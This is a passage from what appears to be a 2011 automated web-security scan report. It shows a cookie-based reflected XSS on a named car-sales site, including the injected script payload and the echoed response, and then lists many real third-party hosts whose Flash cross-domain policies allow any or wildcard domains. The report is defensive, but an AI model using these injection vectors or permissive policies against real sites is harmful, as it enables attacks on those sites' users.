Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.aspx?VXSS=1 HTTP/1.1
Host: www.vehix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: physicalzip=7520162653</script><script>alert(1)</script>c7e77554239; PreviousPostalCode=75201; VXBETA=0; SSLB=1

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Keep-Alive: timeout=5, max=222
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 14:26:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: zip=7520162653</script><script>alert(1)</script>c7e77554239; domain=www.vehix.com; expires=Tue, 14-Jun-2011 13:20:54 GMT; path=/
Set-Cookie: market=; domain=www.vehix.com; expires=Sun, 15-May-2011 13:50:54 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.www.vehix.com
Set-Cookie: SSID=BQB3uRsAAAAAAAA3089NgzgCCDfTz00BAAAAAAAAAAAAN9PPTQA; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:55 GMT
Set-Cookie: SSSC=86.G5606932294410582147.1|0.0; path=/; domain=.www.vehix.com
Set-Cookie: SSRT=N9PPTQE; path=/; domain=.www.vehix.com; expires=Mon, 14-May-2012 13:20:55 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL06
Set-Cookie: PreviousPostalCode=7520162653</script><script>alert(1)</script>c7e77554239; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:55 GMT; path=/
Set-Cookie: anid=3_hkwpRJzAEkAAAAYjI2M2EzMTMtNjI5OS00MzkzLTlmMTMtYzI5ZWMzMGU1ODJk0; domain=.www.vehix.com; expires=Sun, 24-Jul-2011 00:00:55 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2t0kx2ir21freh55ksgbcu55; path=/; HttpOnly
Set-Cookie: zip=7520162653</script><script>alert(1)</script>c7e77554239; domain=.www.vehix.com; expires=Tue, 14-Jun-2011 13:20:55 GMT; path=/
Set-Cookie: market=; domain=.www.vehix.com; expires=Sun, 15-May-2011 13:50:55 GMT; path=/
Set-Cookie: breadcrumb=Home|/default.aspx?VXSS=1:; path=/
Set-Cookie: sid=2t0kx2ir21freh55ksgbcu55; path=/
RTSS: 1
X-Robots-Tag: NOINDEX, NOFOLLOW
X-Powered-By: ASP.NET
MACHINE: PROD-WEB-BL09
Date: Sun, 15 May 2011 13:20:54 GMT
Content-Length: 161063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- // --><script la
...[SNIP]...
<script type="text/javascript">

s.pageName='Home';
s.server='PROD-WEB-BL06';
s.channel='Home';
s.prop9='Logged Out';
s.prop24='Vehix';
s.events='event20';
s.eVar7='7520162653</script><script>alert(1)</script>c7e77554239';
s.eVar22='Home';
s.eVar27='Vehix';
</script>
...[SNIP]...

4. Flash cross-domain policy
There are 39 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 15 May 2011 13:16:52 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 62063

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.3. http://c.gelifesciences.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.gelifesciences.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.gelifesciences.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:55 GMT
Server: Omniture DC/2.0.0
xserver: www64
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.4. http://cfe713.r.axf8.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cfe713.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cfe713.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 13:16:22 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.5. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 15 May 2011 14:07:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.6. http://d1.openx.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:58:44 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "4c3a05-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.7. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 38213
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://h41174.www4.hp.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://h41174.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41174.www4.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "66b4b7-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_I41174-IQ_qppm_iuuq=ffffffff0909d79c45525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.9. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 13:18:32 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://iinet.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://iinet.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: iinet.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:32 GMT
Server: Omniture DC/2.0.0
xserver: www297
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://j2global.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: j2global.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:31 GMT
Server: Omniture DC/2.0.0
xserver: www63
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.12. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 15 May 2011 13:19:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.13. http://media.extole.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.extole.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.extole.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Cache-Control: max-age
Content-Type: text/xml
Date: Sun, 15 May 2011 13:24:35 GMT
Expires: Sun, 22 May 2011 13:24:35 GMT
Last-Modified: Tue, 15 Feb 2011 18:44:08 GMT
Server: nginx/0.7.65
Content-Length: 134
Connection: Close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

4.14. http://met1.hp.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:02 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.15. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 15 May 2011 13:16:31 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.16. http://onebox.extole.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://onebox.extole.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: onebox.extole.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 15 May 2011 13:24:17 GMT
Last-Modified: Mon, 02 May 2011 03:48:32 GMT
Server: nginx/0.7.65
X-Bicyclette-Version: 4eccbe41b71d565e704d3bb4e3fb92e57ac165b5
Content-Length: 131
Connection: Close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

4.17. http://pixel.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.18. http://pro.hit.gemius.pl/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pro.hit.gemius.pl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pro.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:48 GMT
Expires: Mon, 16 May 2011 01:17:48 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Wed, 11 May 2011 05:38:02 GMT
Set-Cookie: Gtestss=IKdPwnGttTsfCO5pQczC5vl7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxTfBsGvGQpGY98SmGc8SpGLlG5nFwP7d6wHsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://hit.gemius.pl -->
<cross-domain-policy>
   <allow-access-from domain="*" />
...[SNIP]...

4.19. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 15 May 2011 13:17:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 15 May 2011 13:17:05 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.20. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 15 May 2011 13:16:29 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.21. http://upc.d2.sc.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://upc.d2.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: upc.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:44 GMT
Server: Omniture DC/2.0.0
xserver: www26
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.22. http://www.burstnet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
Last-Modified: Wed, 11 May 2011 17:56:33 GMT
ETag: "110080-66-4dcacdd1"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Sun, 15 May 2011 13:18:52 GMT
Connection: close
Set-Cookie: 56Q8=CT; expires=Sun, 12-Jun-2011 13:18:52 GMT; path=/; domain=.www.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.23. http://www.odesk.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.odesk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.odesk.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 13:56:37 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Thu, 12 May 2011 00:05:13 GMT
ETag: "c4-4a308f176c040"
Accept-Ranges: bytes
Content-Length: 196
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.24. http://a.ligatus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.ligatus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.ligatus.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:39 GMT
Server: Apache
Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT
ETag: "2d282ae-71-4902476407200"
Accept-Ranges: bytes
Content-Type: text/xml
Cache-Control: private, max-age=600
Age: 0
Expires: Sun, 15 May 2011 15:50:39 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.ligatus.com" />
</cross-domain-policy>

4.25. http://d.ligatus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.ligatus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.ligatus.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"315-1288858532000"
Last-Modified: Thu, 04 Nov 2010 08:15:32 GMT
Content-Type: application/xml
Content-Length: 315
Date: Sun, 15 May 2011 15:40:41 GMT
Connection: close
Server: Apache

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.ligatus.com"/>
<allow-access-from domain="*.net5.nl"/>
<allow-access-from domain="*.sbs6.nl"/>
<allow-access-from domain="*.veronicatv.nl"/>
<allow-access-from domain="*.adverterenbijsbs.nl"/>
...[SNIP]...

4.26. http://edge.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "16b43-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Sun, 15 May 2011 13:59:58 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.27. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=11
Expires: Sun, 15 May 2011 13:56:04 GMT
Date: Sun, 15 May 2011 13:55:53 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
